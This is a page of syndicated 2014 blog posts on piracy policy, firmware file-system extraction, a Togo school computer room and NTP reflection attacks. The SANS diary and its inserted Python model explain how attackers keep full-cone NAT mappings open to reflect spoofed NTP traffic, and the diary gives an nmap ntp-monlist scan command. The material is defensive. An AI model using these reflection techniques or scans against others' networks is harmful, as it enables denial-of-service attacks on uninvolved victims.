Posts tagged ‘Other’

TorrentFreak: Movie Boss Avoids Copyright Q&A to Avoid Piracy “Crazies”

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The main thrust from the government and entertainment industry figures is that something pretty drastic needs to be done about the illegal downloading habits of many Australians.

Consumer groups and citizens, on the other hand, want any response to be measured and coupled with assurances from entertainment companies that Australians will stop being treated like second-class consumers. Local ISPs have varying opinions, depending on the depth of their Big Media affiliations.

Back in July a discussion paper leaked revealing government proposals that include measures such as the tweaking of ISP liability right through to ‘pirate’ website blocking. Communications Minister Malcolm Turnbull later indicated that a public Q&A would be held in September for representatives from the entertainment industries, ISPs, and consumer groups to air their thoughts on the proposals.

While the opportunity was welcomed by the majority of stakeholders, it’s now clear that not everyone will be there.

Village Roadshow is the company that mounted the most aggressive anti-piracy legal action ever against iiNet, one of Australia’s largest ISPs. They have a deep interest in how this debate pans out. This morning, however, co-CEO Graham Burke told ZDNet that his company wouldn’t be attending the discussions because he’ll be overseas at the time.

While that may be true, an email Burke sent to Turnbull and other participants shines rather more light on the topic.

“My company is not prepared to participate in the forum. As expressed to you previously these Q and A style formats are judged by the noise on the night and given the proposed venue I believe this will be weighted by the crazies,” Burke told the Minister.

According to ZDNet, attendees from the ISP industry will include iiNet CEO David Buckingham, Telstra executive director Jane Van Beelen and Foxtel CEO Richard Freudenstein.

On a musical front the Australasian Performing Right Association (APRA) will be in attendance, as will writer and producer Peter Duncan. Looking after the interests of citizens will be consumer group Choice, but it appears Burke and Village Roadshow are concerned about potential dissent from the “crazies”.

“What is at stake here is the very future of Australian film production itself and it is too crucially important to Australia’s economy and the fabric of our society to put at risk with what will be a minuscule group whose hidden agenda is theft of movies,” Burke told the Minister.

It’s perhaps understandable for the movie boss to avoid walking into a losing battle, but referring to those who do wish to participate in an open debate as having a hidden agenda of “movie theft” isn’t going to win over potential allies.

Boycotting discussions in which people get the opportunity to air their perhaps opposing opinions doesn’t indicate a willingness to enter a dialog or negotiations either.

But that might be the nail on the head right there.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: CACC Recap

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’m finally back from the Crimes Against Children Conference (CACC) and caught up from a week’s worth of out-of-office backlog.

CACC is a really fascinating conference. The topic is serious, sobering, and definitely not “fun” in the traditional sense. It focuses on child abuse, child exploitation, and related issues. Talks ranged from horrific case studies to setting up a sting operation. (I never thought about it, but the officers waiting behind the door are in a very specific order. The suspect really doesn’t stand a chance when the cops burst through the doorway.) The fun part, to me, is how amazing all of the people at the conference are, how informative the sessions were, and how I literally learned something new everywhere I turned, even at the evening dinner social gathering.

One of the best things I attended was the Forensic Challenge. This was the first year that they did it. They turned a hotel room into a crime scene and let teams work the scene. I was given special permission to sit quietly and observe as one group went through the mocked-up suspect’s apartment. This was way better than anything on TV, and I’m still blown away by everything I saw and learned. For example, one guy interviewed the suspect while the other two tossed the place. They systematically searched everything. One guy started off dropping to the floor and looking under the furniture before checking everything. The end result looked like a tornado went through the scene.

Afterwards, I asked if real crime scenes look as ransacked after being searched. “No,” said the veteran officer who ran the challenge. “This team put stuff back.” (The team that I observed didn’t win, but they did better than most teams and they weren’t even LEOs!)

What am I doing here?

Speakers at CACC are by invitation-only. Last year I was invited to give a talk. This year, I was asked to give four hands-on training sessions.

Some of the conference’s training sessions went for a half-day or a full-day, and most went really deep into their topic. I decided to take a different route and ended up giving an overview: “In 90 minutes I will not make you an expert on digital photo analysis. But I will give you an idea about what can be done and give you a little hands-on experience.”

Understanding digital photo analysis is critical for people who investigate child-related abuses. Telling real photos from computer graphics can make the difference between a conviction and a walk. In some cases, being able to quickly pull information out of pictures can mean the difference between life and death. My tools and methods are specifically designed to speed up the analysis process, rapidly extract critical details, and allow the analyst to accurately reach the correct conclusion with a high degree of confidence.

There will be a quiz

Even though I practiced this talk for months, I was still concerned about the timing. I knew that I had way too much material for the scheduled time. Worse: I didn’t get the chance to practice in front of a live audience. The first time I actually gave this presentation to a large group was when I walked into the first training session. Yet, the first class ended at exactly 90 minutes. The second class was a little rushed (lots of people had computer troubles at the beginning and that ate nearly 10 minutes), but it still ended on time. And the last two classes were right on schedule. (Whew!)

I did include one surprise in my presentation, just to check their understanding. At the beginning of each class, I showed them a few pictures and asked if they trusted their eyes. Some pictures were real, some were digitally enhanced, and some were completely computer generated. At the end of the talk, I assigned those same pictures to the class (one picture per row of desks) and gave them exactly three minutes to evaluate their assigned image. (Why three minutes? Many photo analysis tools can take hours for an investigator to evaluate results. With my system, a trained person can evaluate a typical photo in under a minute and achieve a high-confidence result. But these students are not fully trained, so I gave them a few extra minutes. Literally: you have three minutes to evaluate one photo.)

After the allotted time, I asked each table for their results. “Table 1: Is that real, digitally enhanced or computer generated?” Someone would shout back “Fake!” I’d then ask “How do you know?” and they would tell me which analyzers and what they saw. I’d do exactly what they said on the big screen and elaborated on the results.

I had been warned that the first training session of the conference would likely be the most alert since everyone was fully rested. But really, the first class stunned me. As a whole, they nailed the pop quiz. The first class even had multiple people per table describing what they found. Despite the fact that I went very quickly through each section, they still understood it enough to ace the quiz.

The second class was right after lunch, so I expected them to be a little lethargic. They got most of the important observations. The other two classes were on the last day of the conference — and after a week of lectures and a big late-night social event. Both classes thought that three minutes was not long enough but still did well. (Not bad for covering six complex topics with about 10 minutes per section, and then only giving them three minutes to apply what they learned.)

Heuristics and Results

The conference ended on Thursday, but I’ve already begun to hear from people who attended my training classes. Each class had between 25 and 35 people, and I’m thrilled that people found value in my training sessions.

For myself, I took away a lot of ideas. With a little research and work, things I learned from talks on psychology and behavioral analysis may be applicable to digital photo forensics. Even little observations made jokingly over dinner may end up forming valuable heuristics or statistical models. I left the conference with three pages of notes about potential research projects. With any luck, a few will even become future blog topics.

/dev/ttyS0 : Mucking About With SquashFS

This post was syndicated from: /dev/ttyS0 and was written by: Craig. Original post: at /dev/ttyS0

SquashFS is an incredibly popular file system for embedded Linux devices. Unfortunately, it is also notorious for being hacked up by vendors, causing the standard SquashFS tools (i.e., unsquashfs) to fail when extracting these file systems.

While projects like the Firmware-Mod-Kit (FMK) have amassed many unsquashfs utilities to work with a wide range of SquashFS variations found in the wild, this approach has several drawbacks, most notably that each individual unsquashfs tool only supports its one particular variation. If you run into a SquashFS image that is mostly compatible with a given unsquashfs tool, but has some minor modification, you can’t extract it – and worse, you probably don’t know why.

So what are these “minor modifications” that cause unsquashfs to fail?

It generally comes down to compression, specifically lzma. Although SquashFS 4.0 now supports a wide variety of compression types, ’twas not always thus. Prior to version 4, SquashFS only officially supported zlib compression. However, lzma produces noticeably smaller output, so many embedded vendors hacked in lzma support, and of course they all did it in a slightly different way.

Some vendors put the standard 13-byte lzma header in front of each compressed data block. This header carries the compression metadata, most notably the lzma properties (lc, lp and pb) and the dictionary size used to compress that block:

#include <stdint.h>

struct lzma_header
{
    uint8_t  properties;         // Contains the lc, lp, and pb property values
    uint32_t dictionary_size;    // Little-endian on disk
    uint64_t uncompressed_size;  // All 0xFF (-1) when unknown at compression time
} __attribute__((packed));       // 1 + 4 + 8 = 13 bytes; without packed the compiler pads to 16

This makes decompressing each data block straightforward; even so, the official SquashFS tools assume that any SquashFS file system prior to 4.0 is compressed using zlib, requiring special lzma versions of these tools to be built in order to support lzma compressed file systems prior to version 4.

Some vendors omitted the uncompressed size field from the lzma header of each data block:

struct lzma_header
{
    uint8_t  properties;         // Contains the lc, lp, and pb property values
    uint32_t dictionary_size;
    //uint64_t uncompressed_size;  // Field dropped: only 5 bytes precede the compressed data
} __attribute__((packed));

This kind of makes sense, since the uncompressed size field is not really required anyway: the SquashFS code knows the exact, or at least the maximum, size of each data block, and lzma itself will just keep uncompressing data until it reaches the end-of-payload marker. While it is valid to set the uncompressed size field to -1 in the lzma header if the size of the original data is not known at compression time, lzma decompressors still expect the field to exist. If it doesn’t, the decompressor will interpret the first eight bytes of the compressed stream as the uncompressed size field, which likely won’t make sense, and decompression will fail.

Other implementations decided to encode lzma properties for each compressed data block using their own custom structure. Take DD-WRT for example:

struct lzma_header
{
    uint8_t pb;
    uint8_t lc;
    uint8_t lp;
    uint8_t unk;
};

Some just use hard-coded compression properties for all data blocks, so there’s no lzma header at the beginning of their compressed data blocks at all. Further, these properties are not necessarily the default lzma property values:

// lzma zlib simplified wrapper
#include <zlib.h>

#define ZLIB_LC 0  // The default value for lc is 3; here, it's been changed to 0
#define ZLIB_LP 0
#define ZLIB_PB 2
...

Still others throw seemingly unnecessary data into the beginning of their data blocks, like the string “7zip”.

Due to the use of non-standard compression, many vendors also change the SquashFS “magic bytes”, which makes standard unsquashfs utilities think that the SquashFS image is invalid.

All this, coupled with the fact that most unsquashfs utilities are pedantic about which SquashFS version(s) they support, requires anyone interested in extracting embedded file systems to litter their system with many different unsquashfs variants.


Luckily, the latest unsquashfs utility supports all versions of SquashFS (v1 – v4). While it still suffers from all the other above problems, it provides a useful base from which to develop a more “hacker friendly” tool.

In a (perhaps futile) attempt to write one extraction tool to support as many SquashFS variations as possible, sasquatch was born. It’s basically unsquashfs v4.3 that has been modified with some nifty features:

  • Doesn’t care about the SquashFS magic bytes
  • Doesn’t trust the reported compression header field
  • Tries all supported decompressors until it finds one that works, regardless of the SquashFS version
  • Adds some vendor-specific lzma implementations to the supported decompressor list
  • Includes an “adaptive” lzma decompressor that attempts to dynamically identify lzma compression options
  • Provides more fine-grained command line control over decompression and debug output

The adaptive lzma decompressor is perhaps the best feature, as it not only generically auto-detects and decompresses several known vendor variations, but potentially can detect and decompress yet-unknown variations. In fact, it has already been able to extract SquashFS images that could not be extracted by any of the unsquashfs utilities in the Firmware-Mod-Kit.

With that said, the code is still beta and there are a couple of known SquashFS images that sasquatch can’t extract (yet). Bug reports and patches welcome.
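To make the header variations above concrete, here is an added example written for this page; it is not code from sasquatch or the Firmware-Mod-Kit. It does in miniature what the adaptive lzma decompressor does: it tries each header layout described above on a single SquashFS data block, rebuilds a standard 13-byte .lzma header for each candidate, and hands the result to liblzma through Python’s lzma module. The vendor layouts come from the post; the sample block, the 8 MiB fallback dictionary size, the two hard-coded property sets and the plausibility bounds are assumptions of the example.

```python
"""Adaptive LZMA header handling for vendor-modified SquashFS data blocks (added example)."""
import lzma
import struct

LZMA_HEADER = struct.Struct("<BIQ")     # properties, dict_size, uncompressed_size: 13 bytes
UNKNOWN_SIZE = 0xFFFFFFFFFFFFFFFF      # -1: size unknown; SquashFS knows the block size anyway
DEFAULT_DICT = 1 << 23                 # assumed 8 MiB when a vendor header carries no dict size

# Constructed sample payload standing in for one block of a file system image.
SAMPLE_DATA = (b"constructed sample block: " + bytes(range(256))) * 16


def decode_props(props):
    """Split an LZMA properties byte into (lc, lp, pb); reject impossible encodings."""
    if not 0 <= props < 9 * 5 * 5:
        raise ValueError(f"invalid properties byte {props:#04x}")
    lc, rest = props % 9, props // 9
    return lc, rest % 5, rest // 5


def encode_props(lc, lp, pb):
    """Inverse of decode_props: pack lc/lp/pb into the single properties byte."""
    if not (0 <= lc <= 8 and 0 <= lp <= 4 and 0 <= pb <= 4):
        raise ValueError("lc/lp/pb out of range")
    return (pb * 5 + lp) * 9 + lc


def candidate_layouts(block):
    """Yield (name, props, dict_size, payload) for each header layout described in the post."""
    if block.startswith(b"7zip"):                       # junk string in front of the block
        for name, props, dsz, payload in candidate_layouts(block[4:]):
            yield "7zip+" + name, props, dsz, payload
        return
    if len(block) >= 13:                                # standard 13-byte header
        props, dsz, _size = LZMA_HEADER.unpack_from(block)
        yield "standard", props, dsz, block[13:]
    if len(block) >= 5:                                 # uncompressed_size field omitted
        props, dsz = struct.unpack_from("<BI", block)
        yield "no-size", props, dsz, block[5:]
    if len(block) >= 4:                                 # DD-WRT style: pb, lc, lp, unk
        pb, lc, lp, _unk = block[:4]
        if lc <= 8 and lp <= 4 and pb <= 4:
            yield "ddwrt", encode_props(lc, lp, pb), DEFAULT_DICT, block[4:]
    for lc, lp, pb in ((3, 0, 2), (0, 0, 2)):           # no header: hard-coded properties
        yield f"raw lc={lc} lp={lp} pb={pb}", encode_props(lc, lp, pb), DEFAULT_DICT, block


def adaptive_decompress(block, max_size=None):
    """Try every layout in turn; return (layout_name, data) for the first that decodes cleanly."""
    failures = []
    for name, props, dsz, payload in candidate_layouts(block):
        try:
            decode_props(props)                         # cheap sanity check before decoding
            if not 4096 <= dsz <= 1 << 26:              # assumed bounds for embedded images
                raise ValueError(f"implausible dictionary size {dsz}")
            # Normalise to a standard .lzma header so liblzma treats every variant the same way.
            data = lzma.decompress(LZMA_HEADER.pack(props, dsz, UNKNOWN_SIZE) + payload,
                                   format=lzma.FORMAT_ALONE)
        except (ValueError, lzma.LZMAError, MemoryError) as exc:
            failures.append(f"{name}: {exc}")
            continue
        if max_size is not None and len(data) > max_size:
            failures.append(f"{name}: decoded {len(data)} bytes, block limit is {max_size}")
            continue
        return name, data
    raise lzma.LZMAError("no known layout fits; tried " + "; ".join(failures))


def make_vendor_blocks(data=SAMPLE_DATA):
    """Build one data block per vendor variant from the post (constructed input, not real firmware)."""
    std = lzma.compress(data, format=lzma.FORMAT_ALONE)  # liblzma writes the 13-byte header, size -1
    props, dsz, _ = LZMA_HEADER.unpack_from(std)
    stream = std[13:]
    lc, lp, pb = decode_props(props)
    return {
        "standard": std,
        "no-size": struct.pack("<BI", props, dsz) + stream,
        "ddwrt": bytes((pb, lc, lp, 0)) + stream,
        "raw": stream,                                   # relies on the lc=3 lp=0 pb=2 defaults
        "7zip": b"7zip" + std,
    }
```

Trying layouts in a fixed order works because a wrong interpretation almost always fails fast: liblzma rejects impossible lc/lp/pb combinations and match distances that exceed the data decoded so far, and a stream that runs out before its end-of-payload marker raises LZMAError. Passing the SquashFS block size as max_size catches the remaining false positives, which is the same check the SquashFS code itself can perform since it knows each block’s maximum size.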

TorrentFreak: Attackers Can ‘Steal’ Bandwidth From BitTorrent Seeders, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

BitTorrent is one of the fastest and most efficient ways to share large files over the Internet. The popular file-sharing protocol is used by dozens of millions of people every day and accounts for a substantial amount of total Internet traffic.

This popularity makes BitTorrent an interesting target for attacks, which various anti-piracy companies have shown in the past. One of these possible attacks was recently unveiled by Florian Adamsky, researcher at the City University London.

In an article published in “Computers & Security” Adamsky and his colleagues reveal an exploit which allows attackers to get a higher download rate from seeders than other people.

In technical terms, the exploit misuses BitTorrent’s choking mechanism of clients that use the “Allowed Fast” extension. Attackers can use this to keep a permanent connection with seeders, requesting the same pieces over and over.

The vulnerability was extensively tested in swarms of various sizes and the researchers found that three malicious peers can already slow download times by up to 414.99%. The greater the number of attackers relative to the number of seeders, the worse the effect becomes.

The impact of the attack further depends on the download clients being used by the seeders in the swarm. The mainline BitTorrent clients and uTorrent are not vulnerable for example, while Vuze, Transmission and Libtorrent-based clients are.

TorrentFreak spoke with Adamsky who predicts that similar results are possible in real swarms. Even very large swarms of more than 1,000 seeders could be affected through a botnet, although it’s hard to predict the precise impact.

“If an attacker uses a botnet to attack the swarm, I think it would be possible to increase the average download time of all peers [of swarms with 1,000 seeders] up to three times,” Adamsky tells us.

“If most of the clients would have a vulnerable client like Vuze or Transmission it would be possible to increase the average download time up to ten times,” he adds.

In their paper the researchers suggest a relatively easy fix to the problem, through an update of the “Allowed Fast” extension. In addition, they also propose a new seeding algorithm that is less prone to these and other bandwidth attacks.


TorrentFreak: Court: Usenet Provider Doesn’t Have to Filter Pirated Content

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

In 2009, Dutch anti-piracy group BREIN, representing the movie and music industries, took Europe’s largest Usenet provider News-Service Europe (NSE) to court.

Through the court BREIN demanded that NSE delete all infringing content from its servers, and in 2011 the Court of Amsterdam sided with the copyright holders.

The Court argued that NSE willingly facilitated copyright infringement through its services. In its verdict the Court ruled that NSE had to remove all copyrighted content, and filter future posts for possible copyright infringements.

Responding to the verdict the Usenet provider said that it was economically unfeasible to filter all messages. The company therefore saw no other option than to shut down its services while the appeal was pending.

This week the Appeals Court ruled on the case overturning the previous verdict, setting a more positive precedent for Usenet providers and similar services.

The Court concluded that NSE does not facilitate copyright infringement as long as it maintains a procedure through which copyright holders can send unlimited takedown notices.

In addition, the Court decided that proactive filtering of copyrighted content is not required, as that conflicts with existing jurisprudence of the European Court of Justice.

“We are very pleased with this ruling,” NSE CEO Patrick Schreurs says. “The Court correctly states that a Usenet provider such as News-Service Europe can not be expected to proactively monitor the messages others place.”

The ruling this week is an interlocutory verdict. The Court still has to rule on how NSE’s notice and takedown procedure should operate. Afterwards, both BREIN and NSE still have the option to take the case to the Supreme Court.


LWN.net: Coghlan: Why Python 4.0 won’t be like Python 3.0

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Python core developer Nick Coghlan seeks to dispel worries that an eventual Python 4.0 release will be as disruptive as 3.0 was. “Why mention this point? Because this switch to ‘Unicode by default’ is the most disruptive of the backwards incompatible changes in Python 3 and unlike the others (which were more language specific), it is one small part of a much larger industry wide change in how text data is represented and manipulated. With the language specific issues cleared out by the Python 3 transition, a much higher barrier to entry for new language features compared to the early days of Python and no other industry wide migrations on the scale of switching from ‘binary data with an encoding’ to Unicode for text modelling currently in progress, I can’t see any kind of change coming up that would require a Python 3 style backwards compatibility break and parallel support period.”

TorrentFreak: Major Torrent Sites and Google Purge The Expendables 3

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

With The Expendables 3 now officially released in theaters, the autopsy over its leak last month and the potential effects on box office figures has begun.

Many news outlets reported yesterday that the first weekend’s takings represent a flop for the third in the Expendables franchise and, of course, those closest to Hollywood are pointing the finger firmly at piracy.

But on the ground, on some of the very sites accused of facilitating piracy of the action movie, there are signs which suggest that this leaked title is being treated somewhat differently to any that have gone before.

LimeTorrents

Noting that the site was named in a Lions Gate lawsuit, TF monitored for the presence of The Expendables 3 torrents on popular torrent site LimeTorrents. The result is shown in the image below.


While the site lists 14 torrents, not a single working Expendables 3 torrent appears in the search results. The three that do appear are sponsored links that do not lead to anything useful.

But while LimeTorrents are clearly doing all they can to comply with the terms of a lawsuit, other sites that have not been named by Lions Gate also appear to have been taking action.

KickassTorrents

KickassTorrents is the world’s second largest torrent site and the go-to place for many looking for fresh content. However, anyone searching for leaked Expendables 3 torrents will be going home disappointed. There are currently nine torrents returned in results, all of which are trailers. The leaked movie cannot be found.


It’s worth noting that like many of the leading torrent sites, Kickass removes torrents following copyright holder requests, so that goes some way to explaining why the Expendables 3 torrents have all disappeared. What is notable, however, is that no fresh ones seem to be reappearing as is usually the case.

RARBG

There’s a similar story over at RARBG, the site placed 10th in our Top Torrent Sites 2014 post. A search produces the two torrents shown in the screenshot below and as they clearly point out, these definitely ain’t The Expendables.


BitSnoop

The effect of these takedowns, whether from rightsholders or introduced on a voluntary basis, can also be seen on torrent sites that specialize in indexing torrents found elsewhere. BitSnoop, the 9th most popular torrent site online with an index of 23 million torrents, currently has none related to The Expendables 3.


Torrentz

Over at Torrentz, a meta-search engine that indexes content on other sites, we can see that just four torrents are returned following an Expendables 3 search, none of which are the movie in question. The links at the top are sponsored and don’t relate to torrents.

The note at the bottom reveals that 41 torrent links have been removed following DMCA notices and their euro equivalent. Again, no more torrents seem to be reappearing.


Google

While torrents disappearing and not reappearing within major torrent sites is quite unusual in itself, perhaps the most dramatic effect can be seen in Google search results.

As previously documented, Lions Gate has put in a herculean effort to have listings removed. This, combined with any torrent site self-censorship efforts, has resulted in a tiny number of usable entries in the first 20 pages of Google results for common searches such as ‘The Expendables 3 + download + torrent’.

Of course, more experienced downloaders and those who persevere through a few searches can still find torrents and other ways to watch the movie. Torrents still remain on The Pirate Bay too, but there are clear signs that the leak of this movie is being treated differently from any other in recent memory, and not only by those involved in its legal distribution either.


Raspberry Pi: The first Raspberry Pi computer room in Togo

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Dominique Laloux first got in touch with us in May 2013 when he was on the point of leaving to spend a year in the rural Kuma region of Togo in Western Africa, an area where, until 2012, 75% of teachers had never used a computer. He had previously joined a team of Togolese friends to set up the Kuma Computer Center in the mountain village of Kuma Tokpli for the students and teachers of five local secondary schools, and planned to introduce Raspberry Pis there.


The building that currently houses Kuma Computer Center’s first computer room in Kuma Tokpli

We next heard from Dominique earlier this month. We were delighted to learn that besides the Center’s first computer room, which has now been up and running for almost two years, the team has established a fully functional Raspberry Pi computer room, with 21 Pis and a couple of other PCs, in Kuma Adamé, a village about 20 minutes’ motorbike ride from Kuma Tokpli. This will be used daily by the 200 students of the local middle school, and was financed largely by former Adamé residents who have settled in Lomé, Togo’s capital. A team of students and teachers from The International School of Brussels, where Dominique works, helped fund the purchase of the Raspberry Pis and their accessories.


The new Raspberry Pi computer room in Kuma Adamé

The initial focus is on teaching the students basic computer literacy, and the team chose the Raspberry Pi based on its low initial cost, its anticipated low maintenance costs, its low power consumption and its use of Open Source software. Dominique believes – and we think he’s probably right – that this is the first Raspberry Pi computer room in Togo! He says,

The most important thing is that we now have a nearly complete “recipe” for the setup of a computer room anywhere in Togo, that would fit a middle school/high school for a total cost of about 6000€. The recipe includes the renovation of a school disaffected room (see what our room looked like 6 months ago in the picture), the installation of electricity and local area network at European standards, the design of furniture built by local workers, the training of teachers, the development of a curriculum to teach, the selection of a local support team, etc. Quite an experience, I must say.


Before work began on the new computer room

Key to the sustainability of the project is that it has been developed within the local community for the benefit of community members, having begun as an idea of teachers in Kuma. Various groups in the community are represented in the management of the project, contributing different kinds of support and expertise. Dominique again:

We are particularly proud of the setup in K. Adamé (we being Seth, Désiré, all other members of the Kuma Computer Center team, and myself). [...] Our project has been operational for nearly 2 years now and it relies mainly on villagers themselves. Seth, who is in charge of the infrastructure in K. Tokpli, is a local farmer growing mainly coffee and cocoa. A team of villagers is responsible for opening the room every day for 2 hours at least, and “cleaning teams” make sure the rooms stay in perfect condition. Local teachers will now take over the regular “computer classes” I taught during the entire past school year — sometimes going up to 40 hours per week. The newly installed Raspberry Pi reinforces our infrastructure and will serve 200+ students in K. Adamé from the next school year…

Currently the team is constructing a small building in Kuma Tokpli, which will become the permanent base of the Kuma Computer Center (and the second largest building in the small village), superseding the facility currently made available by a local farmers’ association. They also continue to work on the curriculum, and hope to introduce the students to programming in addition to teaching ICT and using the Raspberry Pis and other computers to support learning across the curriculum.

If you’d like to support the Kuma Computer Center, with funds or otherwise, have a look at their website. And if you’ve got an idea as good as this one to teach young people about computing, you’ll want to know about the Raspberry Pi Education Fund, recently opened for applications and aimed at supporting initiatives like this with match funding; learn more here!

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that, with no port forwarding enabled through the firewall, Internet-originated NTP requests were getting past the firewall to the misconfigured NTP server?

These packets pass the firewall because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in the gateway router’s UDP Session Control setting (shown in a screenshot in the original post).

If Strict UDP Session Control were enabled, the firewall would treat outbound UDP transactions as I described earlier. When a device on your network initiates an outbound connection to a server, responses from that server are permitted back into your network. Since UDP is stateless, most firewalls simulate state with a timeout. In other words, if no traffic is seen between the device and the server for 600 seconds, don’t permit any response from the server until there is new outbound traffic. But any time related traffic is seen on the correct port the timer is reset to 600 seconds, making it possible for this communication to continue virtually forever as long as one or both devices continue to communicate. (The original post illustrates this with a diagram.)

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem, since the only port exposed is the original ephemeral source port and it is waiting for an NTP reply. It is not likely to be used as an NTP reflector. But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric mode in which, instead of the originating device picking an ephemeral source port for the outbound connection, both the source and the destination ports are 123. (The original post shows the resulting traffic flow in a diagram.)

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Because UDP is connectionless, the source IP can be spoofed and the receiver of the NTP request has no way to validate the source IP or source port, so the attacker can aim the reflected traffic at any IP and port on the Internet. Such attacks are exceedingly difficult to trace back to their origin, so the misconfigured server behind the full-cone NAT gets the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the mapping open virtually forever and use the device to wreak havoc on unsuspecting victims. We have seen indications of attackers holding these mappings open for months.
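The mechanics described above, as an added example that is not part of the original diary or of any vendor's firmware: a small Python model of the gateway's UDP pseudo-state table with the 600-second idle timer from the text. It assumes a port-preserving NAT (the public port equals the LAN host's source port) and uses RFC 5737 documentation addresses for the hosts. Running it shows that in full-cone mode an attacker probing every 599 seconds keeps the mapping alive indefinitely and, when the LAN side is an ntpd in symmetric mode on UDP/123, reaches a socket that will answer; in strict mode the same probes are dropped; and an ephemeral-port client mapping forwards the probes but has nothing listening to reflect them.

```python
"""Model of a consumer gateway's UDP pseudo-state table.

Added illustration, not code from the diary or any vendor. Assumes a
port-preserving NAT (public port == LAN source port) and the 600-second idle
timer quoted in the text. Addresses come from the RFC 5737 documentation ranges.
"""
from dataclasses import dataclass

IDLE_TIMEOUT = 600  # seconds of silence before the pseudo-state is dropped


@dataclass
class Mapping:
    peer: tuple      # (ip, port) the LAN host originally sent to
    expires: float   # absolute time at which the inbound window closes


class UdpNat:
    """strict=False: full-cone NAT (RFC 3489 terminology), any Internet host may
    use an open mapping.  strict=True: the gateway's "Strict UDP Session
    Control", only the peer the LAN host contacted is admitted."""

    def __init__(self, strict: bool) -> None:
        self.strict = strict
        self.table = {}  # (lan_ip, lan_port) -> Mapping

    def outbound(self, now: float, src: tuple, dst: tuple) -> None:
        """LAN host src sends a datagram to Internet host dst: open the window."""
        self.table[src] = Mapping(peer=dst, expires=now + IDLE_TIMEOUT)

    def inbound(self, now: float, src: tuple, lan_dst: tuple) -> bool:
        """Internet host src sends to the public port mapped to lan_dst.
        Returns True when the firewall forwards the datagram inside."""
        m = self.table.get(lan_dst)
        if m is None or now >= m.expires:
            self.table.pop(lan_dst, None)   # timer ran out: window closed
            return False
        if self.strict and src != m.peer:
            return False                    # not the host we talked to: drop
        m.expires = now + IDLE_TIMEOUT     # any admitted packet resets the timer
        return True


LAN_NTPD = ("192.168.1.10", 123)      # ntpd in symmetric mode: source port 123
LAN_CLIENT = ("192.168.1.10", 51234)  # ordinary client query, ephemeral port
UPSTREAM = ("203.0.113.5", 123)       # legitimate NTP peer
ATTACKER = ("198.51.100.7", 40000)    # reflector hunter
LISTENING = {LAN_NTPD}                # inside sockets that answer NTP queries


def reflector_scenario(strict: bool, lan_src: tuple, probes: int = 500) -> dict:
    """Replay the diary's timeline for one NAT mode and one LAN source port.

    t=0: lan_src sends NTP to UPSTREAM.  The attacker then probes the mapping
    every 599 s, just inside the timer.  Returns how many probes the firewall
    forwarded, how many reached a socket that would actually answer (i.e. be
    reflected), whether the legitimate peer still gets in after 601 quiet
    seconds, and how long the window was held open in total.
    """
    nat = UdpNat(strict)
    nat.outbound(0, lan_src, UPSTREAM)
    forwarded = answered = 0
    t = 0
    for _ in range(probes):
        t += 599
        if nat.inbound(t, ATTACKER, lan_src):
            forwarded += 1
            if lan_src in LISTENING:
                answered += 1
    return {
        "forwarded": forwarded,
        "answered": answered,
        "peer_after_idle": nat.inbound(t + 601, UPSTREAM, lan_src),
        "held_open_seconds": t,
    }


if __name__ == "__main__":
    for strict in (False, True):
        for src in (LAN_NTPD, LAN_CLIENT):
            mode = "strict" if strict else "full-cone"
            print(f"{mode:9s} lan_port={src[1]:5d} {reflector_scenario(strict, src)}")
```

Only the full-cone/port-123 combination both forwards and answers every probe; the ephemeral-port mapping forwards the probes but nothing is listening, which is the point made above about client mode, and in strict mode the attacker's packets never reset the timer, so the window closes 600 seconds after the last legitimate exchange.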

What are the lessons to be learned here?

  • If all ISPs fully implemented anti-spoofing filters (BCP 38 ingress filtering), the likelihood of this sort of attack would be lowered substantially. In a nutshell: if a packet is headed into my network and its source IP address belongs to my network, the source must be spoofed, so drop the packet. The converse applies as well: if a packet is leaving my network and its source IP address is not one of mine, the source must be spoofed, so drop it.
  • It can’t hurt to check your network for NTP servers. A single nmap command will quickly confirm whether any are exposed: nmap -sU -A -n -Pn -pU:123 --script=ntp-monlist <target>, where <target> is the host or address range to scan (-Pn skips host discovery and -n skips reverse DNS). If you find one or more, perhaps you can contact the vendor for a resolution.
  • If you own a gateway router that implements full-cone NAT, you may want to see whether it offers the equivalent of the Pace “Strict UDP Session Control” setting. This will prevent an attacker from reaching misconfigured UDP servers on your network through windows opened by outbound traffic.

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: U.S. Court Grants Order to Wipe Pirate Sites from the Internet

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

The entertainment industries often complain that they have virtually no means to target pirate sites, especially those run from overseas.

